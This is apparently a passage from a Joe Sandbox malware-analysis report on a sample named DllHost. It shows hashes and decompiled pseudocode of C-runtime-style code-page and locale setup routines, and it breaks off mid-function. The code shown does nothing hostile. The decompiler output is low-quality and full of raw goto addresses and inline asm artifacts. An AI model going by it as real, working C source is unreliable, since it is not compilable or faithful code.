                                                                                                                                                              • Opcode ID: b20780634c66bba4115daacdc873bb32b6014111f09568c83891686b783ef17d
                                                                                                                                                              • Instruction ID: ba299a915cf891f116adfe6834ebd3c0aaf7ad357bf5ba13a83463cb6c9db932
                                                                                                                                                              • Opcode Fuzzy Hash: b20780634c66bba4115daacdc873bb32b6014111f09568c83891686b783ef17d
                                                                                                                                                              • Instruction Fuzzy Hash: 75A18721B08A4642FB56AF66A4106BAA3B1FF447ACFC44035EE4D53795EE3CD58BD310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DDA70 Relevance: 1.9, APIs: 1, Instructions: 368COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00007FF77FF7191DDA70(signed long long __rbx, long long __rcx, long long __rsi) {
				void* __rdi;
				signed int _t132;
				signed int _t155;
				void* _t172;
				signed int _t186;
				signed int _t192;
				void* _t195;
				signed long long _t232;
				signed long long _t233;
				signed int _t234;
				long long _t235;
				signed long long _t236;
				long long _t238;
				long long _t247;
				signed char* _t255;
				long long _t259;
				char* _t260;
				void* _t263;
				signed long long _t276;
				void* _t279;
				signed char* _t288;
				long long _t293;
				long long _t295;
				signed long long _t296;
				void* _t298;
				signed long long _t299;
				void* _t307;
				void* _t308;
				signed long long _t311;
				signed long long _t314;
				void* _t315;
				signed long long _t318;
				int _t320;
				intOrPtr* _t321;

				_t293 = __rsi;
				_t247 = __rbx;
				_t308 = _t298;
				 *((long long*)(_t308 + 0x10)) = __rbx;
				 *((long long*)(_t308 + 0x18)) = _t295;
				 *((long long*)(_t308 + 0x20)) = __rsi;
				_t299 = _t298 - 0xa0;
				_t232 =  *0x192190a0; // 0x590452ce5669
				_t233 = _t232 ^ _t299;
				 *(_t299 + 0x98) = _t233;
				 *((long long*)(_t308 - 0x58)) = __rcx;
				 *((long long*)(_t308 - 0x50)) = __rbx;
				r13d = 0;
				r14d = 0;
				r12d = 0;
				if ( *((intOrPtr*)(__rcx + 0x138)) == 0) goto 0x191de03f;
				_t321 = __rcx + 0xc;
				 *(_t299 + 0x58) = __rbx;
				_t10 = _t247 + 1; // 0x1
				_t195 = _t10;
				if ( *_t321 != 0) goto 0x191ddaf8;
				 *((long long*)(_t299 + 0x20)) = _t321;
				r9d = 0x1004;
				if (E00007FF77FF7191EB788(_t172, 0, _t308 - 0x58,  *((intOrPtr*)(__rcx + 0x138)), _t307, _t308) != 0) goto 0x191de00f;
				_t251 = __rsi;
				E00007FF77FF7191E7598(_t118, __rsi, _t279);
				 *(_t299 + 0x58) = _t233;
				E00007FF77FF7191E7598(E00007FF77FF7191E6B28(_t233, __rsi), __rsi, _t279);
				_t314 = _t233;
				E00007FF77FF7191E7598(E00007FF77FF7191E6B28(_t233, __rsi), _t251, __rsi);
				_t318 = _t233;
				E00007FF77FF7191E7598(E00007FF77FF7191E6B28(_t233, _t251), _t251, __rsi);
				_t296 = _t233;
				E00007FF77FF7191E7598(E00007FF77FF7191E6B28(_t233, _t251), _t251, __rsi);
				_t311 = _t233;
				E00007FF77FF7191E6B28(_t233, _t251);
				if ( *(_t299 + 0x58) == __rbx) goto 0x191de00f;
				if (_t314 == 0) goto 0x191de00f;
				if (_t311 == 0) goto 0x191de00f;
				if (_t318 == 0) goto 0x191de00f;
				if (_t296 == 0) goto 0x191de00f;
				 *_t311 = 0;
				if (0 + _t195 - 0x100 < 0) goto 0x191ddb9f;
				if (GetCPInfo(_t320) == 0) goto 0x191de00f;
				if ( *(_t299 + 0x80) - 5 > 0) goto 0x191de00f;
				_t132 =  *(_t299 + 0x80) & 0x0000ffff;
				 *(_t299 + 0x50) = _t132;
				if (_t132 - _t195 <= 0) goto 0x191ddc3f;
				if ( *_t321 != 0xfde9) goto 0x191ddc04;
				_t19 = _t311 + 0x80; // 0x80
				r8d = 0x80;
				E00007FF77FF7191D4A30(_t132, 0x20, _t19, _t299 + 0x80,  *((intOrPtr*)(__rcx + 0x138)));
				goto 0x191ddc3f;
				_t255 = _t299 + 0x86;
				if ( *((intOrPtr*)(_t299 + 0x86)) == 0) goto 0x191ddc3f;
				if (_t255[1] == 0) goto 0x191ddc3f;
				_t192 =  *_t255 & 0x000000ff;
				if (_t192 - (_t255[1] & 0x000000ff) > 0) goto 0x191ddc37;
				_t234 = _t192;
				 *((char*)(_t234 + _t311)) = 0x20;
				if (_t192 + _t195 - (_t255[1] & 0x000000ff) <= 0) goto 0x191ddc25;
				if (_t255[2] != 0) goto 0x191ddc15;
				_t26 = _t318 + 0x81; // 0x81
				_t28 = _t311 + 1; // 0x1
				 *((intOrPtr*)(_t299 + 0x40)) = 0;
				 *((intOrPtr*)(_t299 + 0x38)) =  *_t321;
				 *((intOrPtr*)(_t299 + 0x30)) = 0xff;
				 *((long long*)(_t299 + 0x28)) = _t26;
				 *((intOrPtr*)(_t299 + 0x20)) = 0xff;
				_t34 = _t234 + 1; // 0x100
				r8d = _t34;
				if (E00007FF77FF7191EBDF8(0, 0, _t192 + _t195, _t255[2], _t234, __rbx, _t26,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t28, _t307, _t308) == 0) goto 0x191de00f;
				_t35 = _t296 + 0x81; // 0x81
				_t37 = _t311 + 1; // 0x1
				 *((intOrPtr*)(_t299 + 0x40)) = 0;
				r8d = 0x200;
				 *((intOrPtr*)(_t299 + 0x38)) =  *_t321;
				 *((intOrPtr*)(_t299 + 0x30)) = 0xff;
				 *((long long*)(_t299 + 0x28)) = _t35;
				 *((intOrPtr*)(_t299 + 0x20)) = 0xff;
				if (E00007FF77FF7191EBDF8(0, 0, _t192 + _t195, E00007FF77FF7191EBDF8(0, 0, _t192 + _t195, _t255[2], _t234, __rbx, _t26,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t28, _t307, _t308), _t234, _t247, _t35,  *((intOrPtr*)(__rcx + 0x138)), _t293, _t37, _t307, _t308) == 0) goto 0x191de00f;
				_t43 = _t314 + 0x100; // 0x100
				_t259 = _t43;
				 *((intOrPtr*)(_t299 + 0x30)) = 0;
				r9d = 0x100;
				 *((intOrPtr*)(_t299 + 0x28)) =  *_t321;
				 *((long long*)(_t299 + 0x60)) = _t259;
				 *((long long*)(_t299 + 0x20)) = _t259;
				if (E00007FF77FF7191EB950(_t195, E00007FF77FF7191EBDF8(0, 0, _t192 + _t195, E00007FF77FF7191EBDF8(0, 0, _t192 + _t195, _t255[2], _t234, __rbx, _t26,  *((intOrPtr*)(__rcx + 0x138)), __rsi, _t28, _t307, _t308), _t234, _t247, _t35,  *((intOrPtr*)(__rcx + 0x138)), _t293, _t37, _t307, _t308), _t247, _t259, __rcx, _t293, _t311, _t307, _t308) == 0) goto 0x191de00f;
				_t48 = _t314 + 0xfe; // 0xfe
				_t235 = _t48;
				 *_t235 = 0;
				 *((char*)(_t318 + 0x7f)) = 0;
				 *((char*)(_t296 + 0x7f)) = 0;
				 *((char*)(_t318 + 0x80)) = 0;
				 *((char*)(_t296 + 0x80)) = 0;
				 *((long long*)(_t299 + 0x68)) = _t235;
				if ( *(_t299 + 0x50) - _t195 <= 0) goto 0x191dddc1;
				if ( *_t321 != 0xfde9) goto 0x191ddd6d;
				_t55 = _t296 + 0x142; // 0x142
				_t260 = _t55;
				_t56 = _t314 + 0x284; // 0x284
				r9d = 0x8000;
				 *_t56 = r9w;
				 *((char*)(_t318 - _t296 + _t260)) = 0xc2;
				 *_t260 = 0xc2;
				if (0xc2 + _t195 - 0xf5 < 0) goto 0x191ddd52;
				goto 0x191dddc1;
				_t288 = _t299 + 0x86;
				if ( *((intOrPtr*)(_t299 + 0x86)) == 0) goto 0x191dddc1;
				r9d = 0x8000;
				if (_t288[1] == 0) goto 0x191dddc1;
				_t186 =  *_t288 & 0x000000ff;
				if (_t186 - (_t288[1] & 0x000000ff) > 0) goto 0x191dddb9;
				_t236 = _t186;
				 *((intOrPtr*)(_t314 + 0x100 + _t236 * 2)) = r9w;
				 *(_t236 + _t318 + 0x80) = _t186;
				 *(_t236 + _t296 + 0x80) = _t186;
				if (_t186 + _t195 - (_t288[1] & 0x000000ff) <= 0) goto 0x191ddd94;
				if (_t288[2] != 0) goto 0x191ddd84;
				_t71 = _t314 + 0x200; // 0x200
				r15d = 0x80;
				asm("movups xmm0, [ecx]");
				asm("movups xmm1, [ecx+0x10]");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x20]");
				asm("movups xmm1, [ecx+0x30]");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x40]");
				asm("movups xmm1, [ecx+0x50]");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x60]");
				asm("movups xmm1, [ecx+0x70]");
				asm("inc ecx");
				_t315 = _t314 + _t321;
				_t263 = _t71 + _t321;
				asm("inc ecx");
				_t237 =  *((intOrPtr*)(_t263 + 0x70));
				asm("movups xmm0, [ecx]");
				asm("movups xmm1, [ecx+0x10]");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x20]");
				asm("inc ecx");
				asm("movups xmm1, [ecx+0x30]");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x40]");
				asm("inc ecx");
				asm("movups xmm1, [ecx+0x50]");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x60]");
				asm("inc ecx");
				asm("inc ecx");
				 *((long long*)(_t315 + 0x70)) =  *((intOrPtr*)(_t263 + 0x70));
				 *((intOrPtr*)(_t315 + 0x78)) =  *((intOrPtr*)(_t263 + 0x78));
				 *((short*)(_t315 + 0x7c)) =  *(_t263 + 0x7c) & 0x0000ffff;
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("repne inc ecx");
				asm("inc ecx");
				asm("repne inc ecx");
				 *((intOrPtr*)(_t318 + 0x78)) =  *((intOrPtr*)(_t318 + 0x178));
				 *((short*)(_t318 + 0x7c)) =  *(_t318 + 0x17c) & 0x0000ffff;
				 *((char*)(_t318 + 0x7e)) =  *((intOrPtr*)(_t318 + 0x17e));
				asm("movups xmm0, [ebp+0x100]");
				asm("movups xmm1, [ebp+0x110]");
				asm("movups [ebp], xmm0");
				asm("movups xmm0, [ebp+0x120]");
				asm("movups [ebp+0x10], xmm1");
				asm("movups xmm1, [ebp+0x130]");
				asm("movups [ebp+0x20], xmm0");
				asm("movups xmm0, [ebp+0x140]");
				asm("movups [ebp+0x30], xmm1");
				asm("movups xmm1, [ebp+0x150]");
				asm("movups [ebp+0x40], xmm0");
				asm("movups xmm0, [ebp+0x160]");
				asm("movups [ebp+0x50], xmm1");
				asm("movsd xmm1, [ebp+0x170]");
				asm("movups [ebp+0x60], xmm0");
				asm("movsd [ebp+0x70], xmm1");
				 *((intOrPtr*)(_t296 + 0x78)) =  *((intOrPtr*)(_t296 + 0x178));
				 *((short*)(_t296 + 0x7c)) =  *(_t296 + 0x17c) & 0x0000ffff;
				_t155 =  *((intOrPtr*)(_t296 + 0x17e));
				 *(_t296 + 0x7e) = _t155;
				if ( *((intOrPtr*)(__rcx + 0x100)) == 0) goto 0x191ddfc8;
				asm("lock xadd [ecx], eax");
				if ((_t155 | 0xffffffff) != _t195) goto 0x191ddfc8;
				E00007FF77FF7191E6B28( *((intOrPtr*)(_t263 + 0x70)),  *((intOrPtr*)(__rcx + 0x108)) - 0xfe);
				E00007FF77FF7191E6B28( *((intOrPtr*)(_t263 + 0x70)),  *((intOrPtr*)(__rcx + 0x110)) - _t321);
				E00007FF77FF7191E6B28( *((intOrPtr*)(_t263 + 0x70)),  *((intOrPtr*)(__rcx + 0x118)) - _t321);
				E00007FF77FF7191E6B28(_t237,  *((intOrPtr*)(__rcx + 0x100)));
				_t238 =  *(_t299 + 0x58);
				 *_t238 = _t195;
				 *((long long*)(__rcx + 0x100)) = _t238;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(_t299 + 0x60));
				 *((long long*)(__rcx + 0x108)) =  *((intOrPtr*)(_t299 + 0x68));
				_t100 = _t318 + 0x80; // 0x80
				 *((long long*)(__rcx + 0x110)) = _t100;
				_t102 = _t296 + 0x80; // 0x80
				_t242 = _t102;
				 *((long long*)(__rcx + 0x118)) = _t102;
				 *(__rcx + 8) =  *(_t299 + 0x50);
				goto 0x191de033;
				E00007FF77FF7191E6B28(_t102,  *(_t299 + 0x58));
				E00007FF77FF7191E6B28(_t102, _t315);
				E00007FF77FF7191E6B28(_t102, _t318);
				E00007FF77FF7191E6B28(_t242, _t296);
				_t276 = _t311;
				E00007FF77FF7191E6B28(_t242, _t276);
				goto 0x191de08c;
				if ( *((intOrPtr*)(_t276 + 0x100)) == 0) goto 0x191de04e;
				asm("lock dec dword [eax]");
				 *((long long*)(_t276 + 0x100)) = _t247;
				 *_t276 = 0x19203f70;
				 *((long long*)(_t276 + 0x108)) = _t247;
				 *((long long*)(_t276 + 0x110)) = 0x192041f0;
				 *((long long*)(_t276 + 0x118)) = 0x19204370;
				 *((intOrPtr*)(_t276 + 8)) = 1;
				return E00007FF77FF7191D23B0(0, _t186 + _t195,  *(_t299 + 0x98) ^ _t299);
			}





































                                                                                                                                                              0x7ff7191dda70
                                                                                                                                                              0x7ff7191dda70
                                                                                                                                                              0x7ff7191dda70
                                                                                                                                                              0x7ff7191dda73
                                                                                                                                                              0x7ff7191dda77
                                                                                                                                                              0x7ff7191dda7b
                                                                                                                                                              0x7ff7191dda88
                                                                                                                                                              0x7ff7191dda8f
                                                                                                                                                              0x7ff7191dda96
                                                                                                                                                              0x7ff7191dda99
                                                                                                                                                              0x7ff7191ddaaa
                                                                                                                                                              0x7ff7191ddab1
                                                                                                                                                              0x7ff7191ddab5
                                                                                                                                                              0x7ff7191ddab8
                                                                                                                                                              0x7ff7191ddabd
                                                                                                                                                              0x7ff7191ddac3
                                                                                                                                                              0x7ff7191ddac9
                                                                                                                                                              0x7ff7191ddacd
                                                                                                                                                              0x7ff7191ddad2
                                                                                                                                                              0x7ff7191ddad2
                                                                                                                                                              0x7ff7191ddad8
                                                                                                                                                              0x7ff7191ddadc
                                                                                                                                                              0x7ff7191ddae1
                                                                                                                                                              0x7ff7191ddaf2
                                                                                                                                                              0x7ff7191ddafd
                                                                                                                                                              0x7ff7191ddb00
                                                                                                                                                              0x7ff7191ddb07
                                                                                                                                                              0x7ff7191ddb1d
                                                                                                                                                              0x7ff7191ddb24
                                                                                                                                                              0x7ff7191ddb31
                                                                                                                                                              0x7ff7191ddb38
                                                                                                                                                              0x7ff7191ddb45
                                                                                                                                                              0x7ff7191ddb4c
                                                                                                                                                              0x7ff7191ddb5c
                                                                                                                                                              0x7ff7191ddb63
                                                                                                                                                              0x7ff7191ddb66
                                                                                                                                                              0x7ff7191ddb70
                                                                                                                                                              0x7ff7191ddb79
                                                                                                                                                              0x7ff7191ddb82
                                                                                                                                                              0x7ff7191ddb8b
                                                                                                                                                              0x7ff7191ddb94
                                                                                                                                                              0x7ff7191ddb9f
                                                                                                                                                              0x7ff7191ddbab
                                                                                                                                                              0x7ff7191ddbc0
                                                                                                                                                              0x7ff7191ddbce
                                                                                                                                                              0x7ff7191ddbd4
                                                                                                                                                              0x7ff7191ddbdc
                                                                                                                                                              0x7ff7191ddbe2
                                                                                                                                                              0x7ff7191ddbeb
                                                                                                                                                              0x7ff7191ddbed
                                                                                                                                                              0x7ff7191ddbf5
                                                                                                                                                              0x7ff7191ddbfd
                                                                                                                                                              0x7ff7191ddc02
                                                                                                                                                              0x7ff7191ddc04
                                                                                                                                                              0x7ff7191ddc13
                                                                                                                                                              0x7ff7191ddc18
                                                                                                                                                              0x7ff7191ddc1a
                                                                                                                                                              0x7ff7191ddc23
                                                                                                                                                              0x7ff7191ddc25
                                                                                                                                                              0x7ff7191ddc2a
                                                                                                                                                              0x7ff7191ddc35
                                                                                                                                                              0x7ff7191ddc3d
                                                                                                                                                              0x7ff7191ddc42
                                                                                                                                                              0x7ff7191ddc50
                                                                                                                                                              0x7ff7191ddc55
                                                                                                                                                              0x7ff7191ddc59
                                                                                                                                                              0x7ff7191ddc62
                                                                                                                                                              0x7ff7191ddc66
                                                                                                                                                              0x7ff7191ddc6d
                                                                                                                                                              0x7ff7191ddc71
                                                                                                                                                              0x7ff7191ddc71
                                                                                                                                                              0x7ff7191ddc7c
                                                                                                                                                              0x7ff7191ddc85
                                                                                                                                                              0x7ff7191ddc93
                                                                                                                                                              0x7ff7191ddc98
                                                                                                                                                              0x7ff7191ddc9c
                                                                                                                                                              0x7ff7191ddca2
                                                                                                                                                              0x7ff7191ddcab
                                                                                                                                                              0x7ff7191ddcaf
                                                                                                                                                              0x7ff7191ddcb6
                                                                                                                                                              0x7ff7191ddcc1
                                                                                                                                                              0x7ff7191ddcca
                                                                                                                                                              0x7ff7191ddcca
                                                                                                                                                              0x7ff7191ddcd1
                                                                                                                                                              0x7ff7191ddcd5
                                                                                                                                                              0x7ff7191ddcdb
                                                                                                                                                              0x7ff7191ddce2
                                                                                                                                                              0x7ff7191ddce9
                                                                                                                                                              0x7ff7191ddcf7
                                                                                                                                                              0x7ff7191ddcfd
                                                                                                                                                              0x7ff7191ddcfd
                                                                                                                                                              0x7ff7191ddd04
                                                                                                                                                              0x7ff7191ddd07
                                                                                                                                                              0x7ff7191ddd0b
                                                                                                                                                              0x7ff7191ddd0e
                                                                                                                                                              0x7ff7191ddd15
                                                                                                                                                              0x7ff7191ddd1b
                                                                                                                                                              0x7ff7191ddd24
                                                                                                                                                              0x7ff7191ddd31
                                                                                                                                                              0x7ff7191ddd36
                                                                                                                                                              0x7ff7191ddd36
                                                                                                                                                              0x7ff7191ddd40
                                                                                                                                                              0x7ff7191ddd4c
                                                                                                                                                              0x7ff7191ddd52
                                                                                                                                                              0x7ff7191ddd5a
                                                                                                                                                              0x7ff7191ddd5d
                                                                                                                                                              0x7ff7191ddd69
                                                                                                                                                              0x7ff7191ddd6b
                                                                                                                                                              0x7ff7191ddd6d
                                                                                                                                                              0x7ff7191ddd7c
                                                                                                                                                              0x7ff7191ddd7e
                                                                                                                                                              0x7ff7191ddd87
                                                                                                                                                              0x7ff7191ddd89
                                                                                                                                                              0x7ff7191ddd92
                                                                                                                                                              0x7ff7191ddd94
                                                                                                                                                              0x7ff7191ddd97
                                                                                                                                                              0x7ff7191ddda0
                                                                                                                                                              0x7ff7191ddda8
                                                                                                                                                              0x7ff7191dddb7
                                                                                                                                                              0x7ff7191dddbf
                                                                                                                                                              0x7ff7191dddc1
                                                                                                                                                              0x7ff7191dddc8
                                                                                                                                                              0x7ff7191dddce
                                                                                                                                                              0x7ff7191dddd1
                                                                                                                                                              0x7ff7191dddd5
                                                                                                                                                              0x7ff7191dddda
                                                                                                                                                              0x7ff7191ddddf
                                                                                                                                                              0x7ff7191ddde3
                                                                                                                                                              0x7ff7191ddde7
                                                                                                                                                              0x7ff7191dddec
                                                                                                                                                              0x7ff7191dddf1
                                                                                                                                                              0x7ff7191dddf5
                                                                                                                                                              0x7ff7191dddf9
                                                                                                                                                              0x7ff7191dddfe
                                                                                                                                                              0x7ff7191dde03
                                                                                                                                                              0x7ff7191dde07
                                                                                                                                                              0x7ff7191dde0b
                                                                                                                                                              0x7ff7191dde10
                                                                                                                                                              0x7ff7191dde13
                                                                                                                                                              0x7ff7191dde16
                                                                                                                                                              0x7ff7191dde1b
                                                                                                                                                              0x7ff7191dde1f
                                                                                                                                                              0x7ff7191dde22
                                                                                                                                                              0x7ff7191dde26
                                                                                                                                                              0x7ff7191dde2b
                                                                                                                                                              0x7ff7191dde2f
                                                                                                                                                              0x7ff7191dde34
                                                                                                                                                              0x7ff7191dde38
                                                                                                                                                              0x7ff7191dde3d
                                                                                                                                                              0x7ff7191dde41
                                                                                                                                                              0x7ff7191dde46
                                                                                                                                                              0x7ff7191dde4a
                                                                                                                                                              0x7ff7191dde4f
                                                                                                                                                              0x7ff7191dde53
                                                                                                                                                              0x7ff7191dde58
                                                                                                                                                              0x7ff7191dde5d
                                                                                                                                                              0x7ff7191dde64
                                                                                                                                                              0x7ff7191dde6c
                                                                                                                                                              0x7ff7191dde78
                                                                                                                                                              0x7ff7191dde80
                                                                                                                                                              0x7ff7191dde88
                                                                                                                                                              0x7ff7191dde8c
                                                                                                                                                              0x7ff7191dde94
                                                                                                                                                              0x7ff7191dde99
                                                                                                                                                              0x7ff7191ddea1
                                                                                                                                                              0x7ff7191ddea6
                                                                                                                                                              0x7ff7191ddeae
                                                                                                                                                              0x7ff7191ddeb3
                                                                                                                                                              0x7ff7191ddebb
                                                                                                                                                              0x7ff7191ddec0
                                                                                                                                                              0x7ff7191ddec8
                                                                                                                                                              0x7ff7191ddecd
                                                                                                                                                              0x7ff7191dded6
                                                                                                                                                              0x7ff7191ddedb
                                                                                                                                                              0x7ff7191ddee1
                                                                                                                                                              0x7ff7191ddeed
                                                                                                                                                              0x7ff7191ddef9
                                                                                                                                                              0x7ff7191ddefd
                                                                                                                                                              0x7ff7191ddf0a
                                                                                                                                                              0x7ff7191ddf11
                                                                                                                                                              0x7ff7191ddf15
                                                                                                                                                              0x7ff7191ddf1c
                                                                                                                                                              0x7ff7191ddf20
                                                                                                                                                              0x7ff7191ddf27
                                                                                                                                                              0x7ff7191ddf2b
                                                                                                                                                              0x7ff7191ddf32
                                                                                                                                                              0x7ff7191ddf36
                                                                                                                                                              0x7ff7191ddf3d
                                                                                                                                                              0x7ff7191ddf41
                                                                                                                                                              0x7ff7191ddf48
                                                                                                                                                              0x7ff7191ddf4c
                                                                                                                                                              0x7ff7191ddf54
                                                                                                                                                              0x7ff7191ddf58
                                                                                                                                                              0x7ff7191ddf5d
                                                                                                                                                              0x7ff7191ddf67
                                                                                                                                                              0x7ff7191ddf6b
                                                                                                                                                              0x7ff7191ddf71
                                                                                                                                                              0x7ff7191ddf7e
                                                                                                                                                              0x7ff7191ddf83
                                                                                                                                                              0x7ff7191ddf89
                                                                                                                                                              0x7ff7191ddf99
                                                                                                                                                              0x7ff7191ddfa8
                                                                                                                                                              0x7ff7191ddfb7
                                                                                                                                                              0x7ff7191ddfc3
                                                                                                                                                              0x7ff7191ddfc8
                                                                                                                                                              0x7ff7191ddfcd
                                                                                                                                                              0x7ff7191ddfcf
                                                                                                                                                              0x7ff7191ddfdb
                                                                                                                                                              0x7ff7191ddfe3
                                                                                                                                                              0x7ff7191ddfea
                                                                                                                                                              0x7ff7191ddff1
                                                                                                                                                              0x7ff7191ddff8
                                                                                                                                                              0x7ff7191ddff8
                                                                                                                                                              0x7ff7191ddfff
                                                                                                                                                              0x7ff7191de00a
                                                                                                                                                              0x7ff7191de00d
                                                                                                                                                              0x7ff7191de014
                                                                                                                                                              0x7ff7191de01c
                                                                                                                                                              0x7ff7191de024
                                                                                                                                                              0x7ff7191de02c
                                                                                                                                                              0x7ff7191de033
                                                                                                                                                              0x7ff7191de036
                                                                                                                                                              0x7ff7191de03d
                                                                                                                                                              0x7ff7191de049
                                                                                                                                                              0x7ff7191de04b
                                                                                                                                                              0x7ff7191de055
                                                                                                                                                              0x7ff7191de05c
                                                                                                                                                              0x7ff7191de06b
                                                                                                                                                              0x7ff7191de072
                                                                                                                                                              0x7ff7191de080
                                                                                                                                                              0x7ff7191de089
                                                                                                                                                              0x7ff7191de0bc

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Info
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1807457897-0
                                                                                                                                                              • Opcode ID: 37ef7f30ef243c2f4b8f495f4e5f80da2f1987895a72af2af1d9dd7ac8c5cbf8
                                                                                                                                                              • Instruction ID: 8b8e34db38158ac34588852cdb3b239cf4bbe5e1f325bf302e5af9688453df3a
                                                                                                                                                              • Opcode Fuzzy Hash: 37ef7f30ef243c2f4b8f495f4e5f80da2f1987895a72af2af1d9dd7ac8c5cbf8
                                                                                                                                                              • Instruction Fuzzy Hash: 6302AF22A08BC186E751DF28A4452FDB7B4FB59758F859235EB8C43652EF38E1CAD310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EF5C4 Relevance: 1.8, APIs: 1, Instructions: 336COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00007FF77FF7191EF5C4(long long __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				signed int _v48;
				char _v56;
				long long _v72;
				void* _t113;
				void* _t119;
				signed int _t151;
				char _t181;
				char _t182;
				long long _t212;
				long long _t223;
				long long _t241;
				char* _t296;
				char* _t297;
				char* _t329;
				void* _t331;
				long long _t335;
				void* _t336;
				intOrPtr* _t337;
				long long _t339;
				signed long long _t340;
				long long _t341;

				_t333 = __r11;
				_t332 = __r10;
				_t331 = __r9;
				_t223 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r15d = 0;
				_v56 = __rcx;
				_v48 = _v48 & _t340;
				if ( *((intOrPtr*)(__rcx + 0x140)) != _t340) goto 0x191ef612;
				if ( *((intOrPtr*)(__rcx + 0x148)) != _t340) goto 0x191ef612;
				r12d = 0;
				goto 0x191efa83;
				r13d = 1;
				E00007FF77FF7191E7598(_t113, __rcx, __rdx);
				_t339 = _t223;
				E00007FF77FF7191E6B28(_t223, __rcx);
				if (_t339 != 0) goto 0x191ef63c;
				goto 0x191efad9;
				E00007FF77FF7191E7598(r13d, _t336, __rdx);
				_t335 = _t223;
				E00007FF77FF7191E6B28(_t223, _t336);
				if (_t335 != 0) goto 0x191ef664;
				_t119 = E00007FF77FF7191E6B28(_t223, _t339);
				goto 0x191ef634;
				if ( *((intOrPtr*)(__rcx + 0x140)) == _t340) goto 0x191ef9c0;
				E00007FF77FF7191E7598(_t119, _t336, __rbx);
				_t341 = _t223;
				E00007FF77FF7191E6B28(_t223, _t336);
				_t212 = _t341;
				if (_t212 != 0) goto 0x191ef698;
				E00007FF77FF7191E6B28(_t223, _t339);
				goto 0x191ef65d;
				_t299 =  *((intOrPtr*)(__rcx + 0x140));
				_t11 = _t339 + 0x18; // 0x18
				_v72 = _t11;
				r9d = 0x15;
				_t13 =  &_v56; // -15
				E00007FF77FF7191EB788(0, r13d, _t13,  *((intOrPtr*)(__rcx + 0x140)), __r10, __r11);
				_t14 = _t339 + 0x20; // 0x20
				r9d = 0x14;
				_v72 = _t14;
				_t16 =  &_v56; // -15
				E00007FF77FF7191EB788(0, r13d, _t16,  *((intOrPtr*)(__rcx + 0x140)), __r10, __r11);
				_t17 = _t339 + 0x28; // 0x28
				r9d = 0x16;
				_v72 = _t17;
				_t19 =  &_v56; // -15
				E00007FF77FF7191EB788(0, r13d, _t19,  *((intOrPtr*)(__rcx + 0x140)), __r10, __r11);
				_t20 =  &_v56; // -15
				_t21 = _t339 + 0x30; // 0x30
				r9d = 0x17;
				_v72 = _t21;
				E00007FF77FF7191EB788(0, r13d, _t20, _t299, __r10, __r11);
				r9d = 0x18;
				_t23 = _t339 + 0x38; // 0x38
				_t337 = _t23;
				_v72 = _t337;
				_t25 =  &_v56; // -15
				E00007FF77FF7191EB788(0, _t331 - 0x17, _t25, _t299, _t332, _t333);
				r9d = 0x50;
				_t27 =  &_v56; // -15
				_t28 = _t339 + 0x40; // 0x40
				_v72 = _t28;
				E00007FF77FF7191EB788(0, _t331 - 0x4f, _t27, _t299, _t332, _t333);
				r9d = 0x51;
				_t31 =  &_v56; // -15
				_t32 = _t339 + 0x48; // 0x48
				_v72 = _t32;
				E00007FF77FF7191EB788(0, _t331 - 0x50, _t31, _t299, _t332, _t333);
				_t35 =  &_v56; // -15
				_t36 = _t339 + 0x50; // 0x50
				r9d = 0x1a;
				_v72 = _t36;
				E00007FF77FF7191EB788(0, 0, _t35, _t299, _t332, _t333);
				_t38 =  &_v56; // -15
				_t39 = _t339 + 0x51; // 0x51
				r9d = 0x19;
				_v72 = _t39;
				E00007FF77FF7191EB788(0, 0, _t38, _t299, _t332, _t333);
				_t41 =  &_v56; // -15
				_t42 = _t339 + 0x52; // 0x52
				r9d = 0x54;
				_v72 = _t42;
				E00007FF77FF7191EB788(0, 0, _t41, _t299, _t332, _t333);
				_t44 = _t339 + 0x53; // 0x53
				r9d = 0x55;
				_v72 = _t44;
				_t46 =  &_v56; // -15
				E00007FF77FF7191EB788(0, 0, _t46, _t299, _t332, _t333);
				_t47 =  &_v56; // -15
				_t48 = _t339 + 0x54; // 0x54
				r9d = 0x56;
				_v72 = _t48;
				E00007FF77FF7191EB788(0, 0, _t47, _t299, _t332, _t333);
